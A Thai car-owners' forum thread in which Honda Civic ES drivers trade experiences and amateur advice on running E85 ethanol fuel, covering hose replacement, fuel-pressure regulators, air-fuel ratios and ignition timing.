ตอบ
Bonesrs


ชื่อเล่น: บอล

เข้าร่วม: 01 ตุลา 2011
ตอบ: 99

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 46
ให้คำขอบคุณ: 49

ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อังคาร, 28 กุมภา 2012 10:11 - ผมเติม E85 เพียวๆเลยครับ
ดูอยู่ ห่างๆ ตอนนี้ โซฮอล 95 V-Power ของ เชลล์ วิ่งดีเหลือหลาย ลิตรละ 42กลางๆ ใจอยากติด แก๊ส และทำระบบท่อทางน้ำมันสำหรับ e20-85 พร้อมกันเลย แต่ตอนนี้ไม่มี เงิน จบ.....
ได้รับคำขอบคุณจาก: slek 
nismo


ชื่อเล่น: บอล

เข้าร่วม: 30 มิถุนา 2011
ตอบ: 291

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 252
ให้คำขอบคุณ: 552

ที่อยู่: โคราช - ม.ขอนแก่น
ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 28 กุมภา 2012 10:34 - ผมเติม E85 เพียวๆเลยครับ
es5991 พิมพ์ว่า:
เมื่อวาน ลองเติม E20 ไปครึ่งถังครับ ผสมกับน้ำมันเดิม(แก๊สโซฮอล) น่าจะยังไม่รู้ผลเท่าไหร่ ถังต่อไปอาจจะ E20 ล้วนๆ เลยครับ


ผมก็ว่าจะลอง E20 ด้วยนี่หล่ะ

Bonesrs พิมพ์ว่า:
ดูอยู่ ห่างๆ ตอนนี้ โซฮอล 95 V-Power ของ เชลล์ วิ่งดีเหลือหลาย ลิตรละ 42กลางๆ ใจอยากติด แก๊ส และทำระบบท่อทางน้ำมันสำหรับ e20-85 พร้อมกันเลย แต่ตอนนี้ไม่มี เงิน จบ.....


เปลี่ยนท่อเป็น E85 แล้ว E20 คงสบายเลยครับ
ได้รับคำขอบคุณจาก: slek 
pued007


ชื่อเล่น: ปื้ด

เข้าร่วม: 09 ตุลา 2011
ตอบ: 694

Guru ES
Guru ES

ได้รับคำขอบคุณ: 684
ให้คำขอบคุณ: 1070

ที่อยู่: บางกะปิ
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 28 กุมภา 2012 13:26 - ผมเติม E85 เพียวๆเลยครับ
artoasis พิมพ์ว่า:
เพิ่งมาเห็นครับ เลยเข้ามาแนะนำเพิ่มเติมครับ

E85 ใช้ได้ครับ แต่บอกได้เลยครับท่อยางต้องเปลี่ยนครับ ใช้แบบที่ทน E85 ครับ นอกนั้นไม่มีปัญหา
ท่อยางไม่ไม่แตกหรอกครับ แต่มันจะบวมและเป็นเมือกเหนียวๆครับ (ถ้าไม่ใช่ท่อที่ทน E85 นะ)

เปลี่ยนท่อยางไม่เยอะครับ ดังนี้
1. ท่อยางสั้นๆส่วนหัวของปั๊มติ๊กในถัง
2. ท่อยางนำน้ำมันในห้องเครื่อง คือ ท่อยางตรงกรองเข้ารางหัวฉีดและส่วนไหลกลับ

แค่นี้ครับ ส่วนยี่ห้อที่แนะนำคือ GATE ครับ (เทพเลยครับ)


ส่วนเรื่องการปรับจูน เอาแบบง่ายๆๆสุดๆเลยนะ คือ ให้ซื้อเรกูเรเตอร์ปรับแรงดันน้ำมัน สมมุติของเดิมดันอยู่ที่ 3.0bar ก็ปรับให้เป็น 3.5bar
ถ้าเดิมอบู่ 3.5bar ก็ปรับเป็น 4.0bar รับรองจากที่อืดๆ พุ่งทันที (แต่กินน้ำมันนิดนึงนะ แต่ก็คุ้ม)


ถ้าวิธีแบบเอาแรงเลยนะครับ ปรับละเอียดเลยนะครับ คือ

1. เปลี่ยนท่อยางทน E85
2. เปลี่ยนหัวฉีดให้มีขนาด CC ใหญ่กว่าของเดิม 50% ขึ้นไปครับ
เพราะ A/F ของน้ำมัน E10 อยู่ที่ 14.7:1 ตามอุดมคติ ถ้าจูน performance(เอาแรงม้า) จะอยู่ที่ 12:1 (OCTANE 95)
A/F ของน้ำมัน E20 performance(เอาแรงม้า) อยู่ที่ :11:1 หรือ 10:1 (OCTANE 97)
A/F ของน้ำมัน E20 performance(เอาแรงม้า) อยู่ที่ :10:1 หรือ 9:1 (OCTANE 105)
จากนั้นก็พ่วงกล่อง Piggy back เพื่อปรับจูนครับ

นั้นหมายความว่าถ้าเติม E85 แล้วใช้งานโดยไม่ได้ทำอะไรเลย จะอยู่ในสถานะ น้ำมันบาง ครับ ใช้งานปกติได้ แต่ห้ามซัด
ก็จะออกอาการ อืดๆ ตื้อๆ หน่อยครับ

3. องศาไฟ เนื่องจาก E85 มีค่า OCTANE สูง (105) ฉะนั้นจึงเป็นข้อดีมากๆสำหรับผู้ที่จะทำรถแรง ปาดฝามิดๆ ลูกนูนๆ ทำกำลังอัดสูงๆ
ไฟแก่ๆ 15-20 องศา( Advanceได้เยอะ) ยังไงก็ไม่น๊อค ขออย่างเดียวไฟอย่าอ่อน (RETARD)
แต่ของ ES น่าจะปรับตั้งไฟอัตโนมัตินะครับ ใช้งานปกติสบายๆครับ แต่ถ้าทำแรงต้องตั้งองศาไฟใหม่ครับ (พึ่งกล่อง Piggy back)



หน้าที่ของกล่อง Conversion kit E85 คือการปรับเพิ่มปริมาณน้ำมันครับ ผมถึงบอกไงว่า ให้ซื้อเรกูเรเตอร์ปรับแรงดันน้ำมันมาใส่แล้วปรับด้วยมือนี่แหล่ะ Work สุดๆ ซื้อของปลอมก็ได้ Sard / Tomei พันกว่าบาท ใช้ได้แล้วครับ

ถ้าจะซื้อกล่องนี้ แนะนำให้ซื้อ จอฟ้า V-AFC หรือ E-manage มาใส่มีกว่าครับ คุ้มเงินกว่าเยอะ เท่ห์กว่าเยอะ



ส่วนใครจะเติม E20 เติมไปเลยครับ ไม่มีผลอันใด (แต่อย่าซัดนะ)ท่อยางเดิมก็ใช้ได้ มีตังค์เปลี่ยนก็ดี ถ้าหวังจะแรงต้องปรับองศาไฟให้แก่ขึ้นครับ


ใช้ได้ กับ ใช้ดี ต่างกันนะครับ

ถ้าขับแบบปรกติเปลี่ยนเฉพาะท่อยางได้หรือไม่โดยไม่ต้องซื้อเรกูเรเตอร์
แล้วกล่อง ECU ของเรามันจะปรับไฟกับน้ำมันให้อัตโนมัติหรือเปล่าครับ
ปรกติผมใช้รถในเมืองโดยมากก็ไม่เกิน 120 นานๆจะออกต่างจังหวัดทีก็ไม่เกิน 160
อย่างนี้ถือว่าซัดหรือยังครับ รบกวนหน่อยครับอยากใช้มั่งแล้ว ราคาน้ำมันตอนนี้ขาขึ้นครับ


ได้รับคำขอบคุณจาก: slek 
artoasis


ชื่อเล่น: อาร์ท

เข้าร่วม: 03 ตุลา 2008
ตอบ: 295

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 612
ให้คำขอบคุณ: 108

ที่อยู่: BKK
ปี: 2001
อังคาร, 28 กุมภา 2012 15:20 - ผมเติม E85 เพียวๆเลยครับ
อย่าหวังกับการปรับไฟอัตโนมัติมากครับ การปรับไฟของ ECU นั่นหมายความว่าเครื่องเกิดการน๊อคแล้วครับ มันจึงชดเชยค่า
เพื่อลดการน๊อค มันสามารถทำได้แค่ระดับนึงครับ

ปัญหาหลักคืออัตราส่วนผสมบางครับ ถ้าไม่ยอมเพิ่มปริมาณเชื้อเพลิง แล้วมีผลอย่างไร ?

ผลของน้ำมันบาง ก็คือ การจุดระเบิดไม่ทั่วห้องเผาไหม้ แล้วชิงจุดระเบิดก่อนครับ (ก็มันมีแต่ไฟ ไม่มีน้ำมัน)อาการพังก็คือ ก้านสูบหักครับ

อีกอันคือ ไฟอ่อน(RETARD)หรือการจุดระเบิดช้า จะทำให้ความร้อนที่ได้ไม่เกิดงาน สะสมอยู่ในห้องเผาไหม้ อาการพังก็คือ ลูกสูบละลายครับ
(รถใช้แก๊สชอบเป็น เพราะปรับแต่แก๊ส ไม่ยอมปรับไฟ) ถ้าสับเกียร์แล้วรถเกิดอาการ Back Fire นั่นแหล่ะไฟอ่อน

ขับแบบ 160 ไหลๆ ยาวๆ เนี่ยตัวน้ำมันบางเลยครับ
ได้รับคำขอบคุณจาก: saw  pued007  vor_ped  sorn_es02  zan  slek  eak_ce  kismcomed  table  yo555 
pai_ana


เข้าร่วม: 24 สิงหา 2011
ตอบ: 283

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 211
ให้คำขอบคุณ: 93

ที่อยู่: พัทยา-ชลบุรี
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 28 กุมภา 2012 15:20 - ผมเติม E85 เพียวๆเลยครับ
สู้ๆครับ ถ้ามี e100 ผมก้อว่าจะลองนะ เหอะๆ
ได้รับคำขอบคุณจาก: slek 
sanyaaa


เข้าร่วม: 16 มกรา 2012
ตอบ: 277

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 784
ให้คำขอบคุณ: 42

ที่อยู่: โกสุมร่วมใจ ห้า ดอนเมือง
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 28 กุมภา 2012 21:54 - ผมเติม E85 เพียวๆเลยครับ
e85 อ้อคเทน 105 ผมว่าการชิงจุดคงยาก
การจ่ายน้ำมันปกติแล้วจ่ายตามค่า อ้อคซิเจนเซ็นเซอร์ตัวที่1ของท่อไอเสีย
ซึ่งกล่องecuจะคำนวนตามค่าที่ได้รับมาแล้วสั่งหัวฉีดอีกที(ผมว่านะ)
ถ้าผิดปกติไฟรูปเครื่องก้อจะโชว์อันนี้ รถที่ติดแก้สจะเจอบ่อย
(วันเสาร์ที่แล้วผมให้ช่างที่ศูนย์ฮอนด้าเอาnotebookจับดูโดยไม่บอกว่า
เติมe85 ช่างแจ้งว่า ปกติดีครับ)

แต่ก้อต้องดูผลระยะยาวต่อไป
(กลัวแต่จะไม่มีตังค์เติมจะหมดก่อนเครื่องจะพังมากกว่า)

ขอขอบคุณทุกๆๆคนที่ติดตามและให้ความคิดเห็น ซึ่งเป็นประโยชน์มากๆกับพี่น้อง
ชาวESทุกคน)
ได้รับคำขอบคุณจาก: วุฒิชัย  vor_ped  saw  kantaphat  pued007  nocomment  sorn_es02  gassa  zan  slek  nantawat  meseoul  natan  ต่ายซ่า  yoosabai  สมชาย 
sanyaaa


เข้าร่วม: 16 มกรา 2012
ตอบ: 277

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 784
ให้คำขอบคุณ: 42

ที่อยู่: โกสุมร่วมใจ ห้า ดอนเมือง
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 28 กุมภา 2012 21:59 - ผมเติม E85 เพียวๆเลยครับ
pai_ana พิมพ์ว่า:
สู้ๆครับ ถ้ามี e100 ผมก้อว่าจะลองนะ เหอะๆ


+1


ได้รับคำขอบคุณจาก: slek  สมชาย 
benzd


ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

ที่อยู่: เกตุม-มหาชัย-สมุทรสาคร
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 28 กุมภา 2012 22:00 - ผมเติม E85 เพียวๆเลยครับ
artoasis พิมพ์ว่า:
อย่าหวังกับการปรับไฟอัตโนมัติมากครับ การปรับไฟของ ECU นั่นหมายความว่าเครื่องเกิดการน๊อคแล้วครับ มันจึงชดเชยค่า
เพื่อลดการน๊อค มันสามารถทำได้แค่ระดับนึงครับ

ปัญหาหลักคืออัตราส่วนผสมบางครับ ถ้าไม่ยอมเพิ่มปริมาณเชื้อเพลิง แล้วมีผลอย่างไร ?

ผลของน้ำมันบาง ก็คือ การจุดระเบิดไม่ทั่วห้องเผาไหม้ แล้วชิงจุดระเบิดก่อนครับ (ก็มันมีแต่ไฟ ไม่มีน้ำมัน)อาการพังก็คือ ก้านสูบหักครับ

อีกอันคือ ไฟอ่อน(RETARD)หรือการจุดระเบิดช้า จะทำให้ความร้อนที่ได้ไม่เกิดงาน สะสมอยู่ในห้องเผาไหม้ อาการพังก็คือ ลูกสูบละลายครับ
(รถใช้แก๊สชอบเป็น เพราะปรับแต่แก๊ส ไม่ยอมปรับไฟ) ถ้าสับเกียร์แล้วรถเกิดอาการ Back Fire นั่นแหล่ะไฟอ่อน

ขับแบบ 160 ไหลๆ ยาวๆ เนี่ยตัวน้ำมันบางเลยครับ
ถ้าแก๊สจูนไว้หนากว่าน้ำมันนิดนึงก็ไม่เป็นไรใช่ป่ะครับ
ได้รับคำขอบคุณจาก: slek 
SIRATH BUALUANG


ชื่อเล่น: กรด

เข้าร่วม: 08 ธันวา 2009
ตอบ: 740

Guru ES
Guru ES

ได้รับคำขอบคุณ: 701
ให้คำขอบคุณ: 577

ที่อยู่: 3 จังหวัดชายแดนใต้
ปี: 2001
สี: แดง ไฟร์เปปเปอร์ (R-507P)
อังคาร, 28 กุมภา 2012 22:39 - ผมเติม E85 เพียวๆเลยครับ
ยาว ไป ครับ...

มาส่งกำลังใจเหมือนเดิม..

ได้รับคำขอบคุณจาก: slek 
artoasis


ชื่อเล่น: อาร์ท

เข้าร่วม: 03 ตุลา 2008
ตอบ: 295

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 612
ให้คำขอบคุณ: 108

ที่อยู่: BKK
ปี: 2001
อังคาร, 28 กุมภา 2012 23:03 - ผมเติม E85 เพียวๆเลยครับ
sanyaaa พิมพ์ว่า:
e85 อ้อคเทน 105 ผมว่าการชิงจุดคงยาก
การจ่ายน้ำมันปกติแล้วจ่ายตามค่า อ้อคซิเจนเซ็นเซอร์ตัวที่1ของท่อไอเสีย
ซึ่งกล่องecuจะคำนวนตามค่าที่ได้รับมาแล้วสั่งหัวฉีดอีกที(ผมว่านะ)
ถ้าผิดปกติไฟรูปเครื่องก้อจะโชว์อันนี้ รถที่ติดแก้สจะเจอบ่อย
(วันเสาร์ที่แล้วผมให้ช่างที่ศูนย์ฮอนด้าเอาnotebookจับดูโดยไม่บอกว่า
เติมe85 ช่างแจ้งว่า ปกติดีครับ)

แต่ก้อต้องดูผลระยะยาวต่อไป
(กลัวแต่จะไม่มีตังค์เติมจะหมดก่อนเครื่องจะพังมากกว่า)

ขอขอบคุณทุกๆๆคนที่ติดตามและให้ความคิดเห็น ซึ่งเป็นประโยชน์มากๆกับพี่น้อง
ชาวESทุกคน)



ครับ ออกเทน 105 ไม่ชิงจุดระเบิดครับ ถ้าส่วนผสมมันไม่บางจนผิดปกติครับมากๆครับ
และ ECU (Close Loop) รถเดิมที่ไม่ปรับแต่ง ยังไงมันก็พยายามวิ่งหาค่า 14.7:1 ครับ ยังไงมันก็แสดงผลว่า ปกติ
แต่สัดส่วนของ E85 ต้องการที่ 9:1 ครับ เบื้องต้นยังไง ECUเดิม ก็ไม่รู้ครับ มันรู้แต่ว่าต้องสั่งน้ำมันให้ฉีดที่ 14.7:1 ครับ

ส่วนรถที่ติดแก็สแล้วไฟ Engineโชว์ ไม่ใช่สัดส่วน A/F ผิดครับ แต่เป็น Timing ที่ผิดจากการหลอกสัญญาณครับ
(สัญญาณสั่งให้หัวฉีด ฉีดน้ำมัน แต่ความเป็นจริงหัวฉีดน้ำมันปิดอยู่ แล้วสั่งให้หัวฉีดแก๊สฉีด แต่ดันเจาะรูไม่เหมาะสมทำให้ระยะเวลายกหัวฉีดไม่สัมพันธ์กัน ECUหลัก เลยงง ครับ)

อยากรู้ว่าช่างเก่งไหม ลองถามดูครับว่า ค่า A/F ของ E85 เท่าไหร่? ลองภูมิช่างดู


ซึ่งนี่แหล่ะครับที่เป็นเหตุผลที่ว่าบางจังหวะรถจะอืดๆครับ เพราะรถมันรู่จักแต่ค่า 14.7:1

(ลองถอดหัวเทียนออกมาดูสีเขม่าก็รู้แล้วครับว่าบางหรือไม่บาง สีเทา=บาง สีน้ำตาล=แจ่มสุดๆ สีดำ=หนา)


ใช้ไปเถอะครับ ใช้งานทั่วไป ยังไงก็ใช้ได้ครับ (ลองไปดู EG3D club สิครับ จูนใช้ E20 E85 ตรึมเลยครับ แรงด้วยครับ)


ยุคนี้ถ้าไม่หาหนทางใหม่ๆ จนตายลูกเดียว
ได้รับคำขอบคุณจาก: vor_ped  saw  pued007  sorn_es02  วุฒิชัย  zan  Gong  slek  eak_ce  nantawat  Gazilot  meseoul  table  yoosabai  สมชาย 
matmann


ชื่อเล่น: นัท

เข้าร่วม: 26 ตุลา 2011
ตอบ: 436

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 398
ให้คำขอบคุณ: 169

ที่อยู่: หนองแขม กทม.
ปี: 2001
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อังคาร, 28 กุมภา 2012 23:06 - ผมเติม E85 เพียวๆเลยครับ
แหะ ๆ ไม่อายหรอก..ที่จาบอกว่า ..ขอตามมมด้วยคนคร๊าบบบ อิอิ
ได้รับคำขอบคุณจาก: วุฒิชัย  slek 
artoasis


ชื่อเล่น: อาร์ท

เข้าร่วม: 03 ตุลา 2008
ตอบ: 295

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 612
ให้คำขอบคุณ: 108

ที่อยู่: BKK
ปี: 2001
อังคาร, 28 กุมภา 2012 23:06 - ผมเติม E85 เพียวๆเลยครับ
benzd พิมพ์ว่า:
artoasis พิมพ์ว่า:
อย่าหวังกับการปรับไฟอัตโนมัติมากครับ การปรับไฟของ ECU นั่นหมายความว่าเครื่องเกิดการน๊อคแล้วครับ มันจึงชดเชยค่า
เพื่อลดการน๊อค มันสามารถทำได้แค่ระดับนึงครับ

ปัญหาหลักคืออัตราส่วนผสมบางครับ ถ้าไม่ยอมเพิ่มปริมาณเชื้อเพลิง แล้วมีผลอย่างไร ?

ผลของน้ำมันบาง ก็คือ การจุดระเบิดไม่ทั่วห้องเผาไหม้ แล้วชิงจุดระเบิดก่อนครับ (ก็มันมีแต่ไฟ ไม่มีน้ำมัน)อาการพังก็คือ ก้านสูบหักครับ

อีกอันคือ ไฟอ่อน(RETARD)หรือการจุดระเบิดช้า จะทำให้ความร้อนที่ได้ไม่เกิดงาน สะสมอยู่ในห้องเผาไหม้ อาการพังก็คือ ลูกสูบละลายครับ
(รถใช้แก๊สชอบเป็น เพราะปรับแต่แก๊ส ไม่ยอมปรับไฟ) ถ้าสับเกียร์แล้วรถเกิดอาการ Back Fire นั่นแหล่ะไฟอ่อน

ขับแบบ 160 ไหลๆ ยาวๆ เนี่ยตัวน้ำมันบางเลยครับ
ถ้าแก๊สจูนไว้หนากว่าน้ำมันนิดนึงก็ไม่เป็นไรใช่ป่ะครับ



จูนเท่าน้ำมันเลยครับ เพราะอัตราส่วนของแก๊ส A/F ratio อยู่ที่ 15:1 ครับ เพราะฉะนั้นจูนเท่าอัตราน้ำมันก็ถือว่าหนากำลังดีแล้วครับ
ได้รับคำขอบคุณจาก: วุฒิชัย  zan  slek 
offerza


ชื่อเล่น: อ๊อฟ

เข้าร่วม: 05 มกรา 2009
ตอบ: 93

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 51

ที่อยู่: ดินแดง
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 29 กุมภา 2012 00:21 - ผมเติม E85 เพียวๆเลยครับ
ถังแรกหมดไปแล้วครับเติม1000 บาท วิ่งได้ 417ก.ม.
โดยรวมถือว่าดีเลย แต่เจออาการคือ
1.เครื่องเย็นๆจะสตาร์ทติดต้องมีรอบสอง
2.รอบเดินเบามีกระตุกนิดๆพอรู้สึกได้ แต่เจอครั้งเดียว
อยากเปลี่ยนท่อนํ้ามันแต่ไม่รู้ทําที่ใหน ราคาเท่าไรครับ
รบกวนแนะนําด้วยครับ พรุ่งนี้จะไปเติมถังสองเดี๋ยวจะ
มาแชร์ข้อมูลอีกครับ
ได้รับคำขอบคุณจาก: วุฒิชัย  slek  นกซาซ่าส์ โซดาสิงห์ 
tummy_ES-4328


ชื่อเล่น: ตั้มมี่

เข้าร่วม: 22 พฤศจิกา 2010
ตอบ: 126

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 173
ให้คำขอบคุณ: 69

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 29 กุมภา 2012 15:12 - ผมเติม E85 เพียวๆเลยครับ
ผมใช้กล่อง E85 มาปีกว่า ๆ แระครับ
ไม่มีอะไรปกติดีทุกอย่าง ไม่เคยทำอะไรเกี่ยวกับเครื่องเลย
ได้รับคำขอบคุณจาก: วุฒิชัย  zan  slek  Gazilot 
pai_ana


เข้าร่วม: 24 สิงหา 2011
ตอบ: 283

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 211
ให้คำขอบคุณ: 93

ที่อยู่: พัทยา-ชลบุรี
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 29 กุมภา 2012 15:33 - ผมเติม E85 เพียวๆเลยครับ
หมดถัง เติมไป 600 บาท วิ่งได้ 270 โล ไม่ได้เข้าเมืองชลเลย ปั๊มไกลไปหน่อย
ได้รับคำขอบคุณจาก: วุฒิชัย  slek 
pued007


ชื่อเล่น: ปื้ด

เข้าร่วม: 09 ตุลา 2011
ตอบ: 694

Guru ES
Guru ES

ได้รับคำขอบคุณ: 684
ให้คำขอบคุณ: 1070

ที่อยู่: บางกะปิ
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 29 กุมภา 2012 16:06 - ผมเติม E85 เพียวๆเลยครับ
สรุปว่าถ้าใช้แบบปรกติทั่วไป มีซิ่งบ้างนิดหน่อย ก็ควร
1.เปลี่ยนท่อยางสั้นๆส่วนหัวของปั๊มติ๊กในถัง
2.ท่อยางนำน้ำมันในห้องเครื่อง คือ ท่อยางตรงกรองเข้ารางหัวฉีดและส่วนไหลกลับ
3.ซื้อเรกูเรเตอร์ปรับแรงดันน้ำมัน
ผมเข้าใจถูกมั๊ยครับ และทั้งหมดนี้ค่าใช้จ่ายอยู่ที่เท่าไหร่ และจะไปทำได้ที่ไหนช่วยชี้เป้าด้วยครับ

ได้รับคำขอบคุณจาก: วุฒิชัย  slek  นกซาซ่าส์ โซดาสิงห์ 
es5991


เข้าร่วม: 19 พฤษภาคม 2011
ตอบ: 390

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 463
ให้คำขอบคุณ: 157

ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 29 กุมภา 2012 16:43 - ผมเติม E85 เพียวๆเลยครับ
pued007 พิมพ์ว่า:
สรุปว่าถ้าใช้แบบปรกติทั่วไป มีซิ่งบ้างนิดหน่อย ก็ควร
1.เปลี่ยนท่อยางสั้นๆส่วนหัวของปั๊มติ๊กในถัง
2.ท่อยางนำน้ำมันในห้องเครื่อง คือ ท่อยางตรงกรองเข้ารางหัวฉีดและส่วนไหลกลับ
3.ซื้อเรกูเรเตอร์ปรับแรงดันน้ำมัน
ผมเข้าใจถูกมั๊ยครับ และทั้งหมดนี้ค่าใช้จ่ายอยู่ที่เท่าไหร่ และจะไปทำได้ที่ไหนช่วยชี้เป้าด้วยครับ



อยากรู้ด้วยคน ครับ
ได้รับคำขอบคุณจาก: saw  วุฒิชัย  slek 
วุฒิชัย


ชื่อเล่น: ตั้ม

เข้าร่วม: 26 มิถุนา 2011
ตอบ: 4151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3281
ให้คำขอบคุณ: 4338

ที่อยู่: แม่สอด-ตาก-โขทัย-อุตรดิตถ์
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 29 กุมภา 2012 19:11 - ผมเติม E85 เพียวๆเลยครับ
tummy_ES-4328 พิมพ์ว่า:
ผมใช้กล่อง E85 มาปีกว่า ๆ แระครับ
ไม่มีอะไรปกติดีทุกอย่าง ไม่เคยทำอะไรเกี่ยวกับเครื่องเลย



ใช้แต่กล่องหรอครับ

แล้วพวกท่อยางได้เปลื่ยนป่าวครับ

ตอบด้วยนะครับอยากรู้ครับ ขอบคุณมากครับ
ได้รับคำขอบคุณจาก: slek 
offerza


ชื่อเล่น: อ๊อฟ

เข้าร่วม: 05 มกรา 2009
ตอบ: 93

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 42
ให้คำขอบคุณ: 51

ที่อยู่: ดินแดง
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 29 กุมภา 2012 22:05 - ผมเติม E85 เพียวๆเลยครับ
pued007 พิมพ์ว่า:
สรุปว่าถ้าใช้แบบปรกติทั่วไป มีซิ่งบ้างนิดหน่อย ก็ควร
1.เปลี่ยนท่อยางสั้นๆส่วนหัวของปั๊มติ๊กในถัง
2.ท่อยางนำน้ำมันในห้องเครื่อง คือ ท่อยางตรงกรองเข้ารางหัวฉีดและส่วนไหลกลับ
3.ซื้อเรกูเรเตอร์ปรับแรงดันน้ำมัน
ผมเข้าใจถูกมั๊ยครับ และทั้งหมดนี้ค่าใช้จ่ายอยู่ที่เท่าไหร่ และจะไปทำได้ที่ไหนช่วยชี้เป้าด้วยครับ


อยากรู้ด้วยครับ

ได้รับคำขอบคุณจาก: slek 
coco1340


เข้าร่วม: 11 มกรา 2012
ตอบ: 1239

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1169
ให้คำขอบคุณ: 302

ที่อยู่: พระราม 2
พุธ, 29 กุมภา 2012 23:12 - ผมเติม E85 เพียวๆเลยครับ
เข้ามาเชียร์ต่อครับบบบบบ สู้ ๆ นะผู้กล้าทุกคนนน แต่อยากรู้อ่ะครับ k20 มานเติมได้ไหมอ่า E85 เนี้ย แห่ะวานผู้รู้แจ้งหน่อยน้าคร้าบบบ ไม่งั้นค่าน้ำมันเพียบแน่ ๆ
ได้รับคำขอบคุณจาก: slek 
sanyaaa


เข้าร่วม: 16 มกรา 2012
ตอบ: 277

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 784
ให้คำขอบคุณ: 42

ที่อยู่: โกสุมร่วมใจ ห้า ดอนเมือง
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 1 มีนา 2012 10:53 - ผมเติม E85 เพียวๆเลยครับ
coco1340 พิมพ์ว่า:
เข้ามาเชียร์ต่อครับบบบบบ สู้ ๆ นะผู้กล้าทุกคนนน แต่อยากรู้อ่ะครับ k20 มานเติมได้ไหมอ่า E85 เนี้ย แห่ะวานผู้รู้แจ้งหน่อยน้าคร้าบบบ ไม่งั้นค่าน้ำมันเพียบแน่ ๆ

เครื่อง 2.0 มันเป็นเครื่อง i-vtec
เติมได้สบายอยู่แล้ว ฟันธง
(เคื่องผม 1.7a ยังสบายๆ)
ได้รับคำขอบคุณจาก: วุฒิชัย  slek  สมชาย 
tummy_ES-4328


ชื่อเล่น: ตั้มมี่

เข้าร่วม: 22 พฤศจิกา 2010
ตอบ: 126

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 173
ให้คำขอบคุณ: 69

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 1 มีนา 2012 11:01 - ผมเติม E85 เพียวๆเลยครับ
วุฒิชัย พิมพ์ว่า:
tummy_ES-4328 พิมพ์ว่า:
ผมใช้กล่อง E85 มาปีกว่า ๆ แระครับ
ไม่มีอะไรปกติดีทุกอย่าง ไม่เคยทำอะไรเกี่ยวกับเครื่องเลย



ใช้แต่กล่องหรอครับ

แล้วพวกท่อยางได้เปลื่ยนป่าวครับ

ตอบด้วยนะครับอยากรู้ครับ ขอบคุณมากครับ


ไม่ได้เปลี่ยนครับ เปลี่ยนแต่กล่อง
ได้รับคำขอบคุณจาก: วุฒิชัย  slek  สมชาย 
sanyaaa


เข้าร่วม: 16 มกรา 2012
ตอบ: 277

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 784
ให้คำขอบคุณ: 42

ที่อยู่: โกสุมร่วมใจ ห้า ดอนเมือง
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 1 มีนา 2012 11:11 - ผมเติม E85 เพียวๆเลยครับ
pued007 พิมพ์ว่า:
สรุปว่าถ้าใช้แบบปรกติทั่วไป มีซิ่งบ้างนิดหน่อย ก็ควร
1.เปลี่ยนท่อยางสั้นๆส่วนหัวของปั๊มติ๊กในถัง
2.ท่อยางนำน้ำมันในห้องเครื่อง คือ ท่อยางตรงกรองเข้ารางหัวฉีดและส่วนไหลกลับ
3.ซื้อเรกูเรเตอร์ปรับแรงดันน้ำมัน
ผมเข้าใจถูกมั๊ยครับ และทั้งหมดนี้ค่าใช้จ่ายอยู่ที่เท่าไหร่ และจะไปทำได้ที่ไหนช่วยชี้เป้าด้วยครับ




ใครพอมีรูปไหม๊ช่วยโพสที
เพื่อจะได้ไปซื้อเอง และเปลี่ยนเองได้ จาได้ไม่ต้องพึ่งพาอู่หรือศูนย์

มีมั๊ยครับ


แก้ไขล่าสุดโดย เมื่อ อังคาร, 6 มีนา 2012 13:22, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: slek  สมชาย  นกซาซ่าส์ โซดาสิงห์ 
bangnum


